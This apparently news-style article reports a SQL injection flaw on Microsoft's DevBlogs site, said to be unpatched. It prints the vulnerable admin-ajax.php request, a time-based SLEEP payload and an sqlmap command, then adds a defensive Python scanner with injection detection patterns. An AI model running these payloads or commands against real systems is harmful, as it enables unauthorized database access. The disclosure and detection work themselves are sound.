A security researcher recently discovered a critical SQL injection vulnerability on Microsoft’s DevBlogs site (https://devblogs.microsoft.com), allowing attackers to manipulate the database with malicious SQL queries, threatening platform security and data integrity.
SQL Injection Vulnerability
The vulnerability was found in the WordPress-based CMS of DevBlogs, specifically in a request to the admin-ajax.php endpoint handling asynchronous operations:
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://devblogs.microsoft.com/
Cookie: VALUE
Content-Length: 17894
Accept-Encoding: gzip,deflate,br
User-Agent: NOTROBOT
Host: devblogs.microsoft.com
Connection: Keep-alive
action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the
The query parameter was vulnerable to SQL injection. Using a time-based payload such as (SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk), the researcher demonstrated that the injected input reached the database and altered the query's execution.
The researcher used sqlmap to extract database names, proving the vulnerability. The command:
sqlmap -r savedreqsql.txt --dbs --force-ssl -p query
revealed databases including information_schema, performance_schema, and wp_devblogs.
The researcher found that the vulnerability also supported error-based SQL injection, which was easier to exploit than the initial time-based method.
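As an added illustration from the defender's side (not code from the article or from Microsoft), the following script scans constructed web-server log lines for admin-ajax.php POSTs whose parameters carry time-based or subquery injection signatures like the probe described above, and raises the severity when the response latency confirms the delay. The tab-separated log format, the action name in the sample and the 4000 ms threshold are assumptions for this example.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Signatures of common time-based and subquery SQL injection probes (case-insensitive).
SQLI_PATTERNS = {
    "mysql_sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "mysql_benchmark": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "mssql_waitfor": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "subselect": re.compile(r"\(\s*SELECT\b", re.I),
}
TIMED = {"mysql_sleep", "mysql_benchmark", "mssql_waitfor"}
SLOW_MS = 4000  # assumed threshold: a SLEEP(5) probe that fires exceeds this latency

def indicators(value: str) -> list:
    """Names of the SQLi signatures found in one decoded parameter value."""
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(value)]

def scan_request(path: str, elapsed_ms: int, body: str) -> Optional[dict]:
    """Inspect one admin-ajax.php POST; return an alert dict, or None if clean."""
    if not path.startswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    hits = {}
    for key, values in params.items():
        found = [name for v in values for name in indicators(v)]
        if found:
            hits[key] = found
    if not hits:
        return None
    # A timing probe confirmed by the measured delay is high confidence; pattern alone is medium.
    timed = any(TIMED & set(found) for found in hits.values())
    severity = "high" if timed and elapsed_ms >= SLOW_MS else "medium"
    return {"action": params.get("action", [""])[0], "params": hits, "severity": severity}

def scan_log(lines: list) -> list:
    """Each constructed line: METHOD<TAB>PATH<TAB>ELAPSED_MS<TAB>URL-ENCODED-BODY."""
    alerts = []
    for line in lines:
        method, path, elapsed, body = line.rstrip("\n").split("\t", 3)
        if method == "POST":
            alert = scan_request(path, int(elapsed), body)
            if alert:
                alerts.append(alert)
    return alerts

# Constructed sample log lines (not from the page); the second mirrors the probe shape described above.
SAMPLE_LOG = [
    "POST\t/wp-admin/admin-ajax.php\t120\taction=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the",
    "POST\t/wp-admin/admin-ajax.php\t5213\taction=load_more_results2&limit=10&offset=10"
    "&query=HELLO%20(SELECT%204008%20FROM%20(SELECT(SLEEP(5)))LDNk)&search_term=the",
    "GET\t/wp-content/uploads/x.png\t15\t",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Only the second sample line produces an alert, with severity "high" because the SLEEP signature coincides with a 5-second response.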
After reporting the issue to Microsoft’s security team, researcher Zhenwarx received an unexpected response. Despite the severity of the flaw, the DevBlogs subdomain was marked “out of scope,” leaving the vulnerability unpatched at the time.
This highlights the critical need for proper input validation and clear scope definitions in bug bounty programs.
DevBlogs, as a public-facing Microsoft subdomain, is a prime target for attackers. Organizations should regularly audit security practices, especially on WordPress platforms, to prevent such vulnerabilities. There is hope Microsoft will reassess its scope and resolve the issue soon.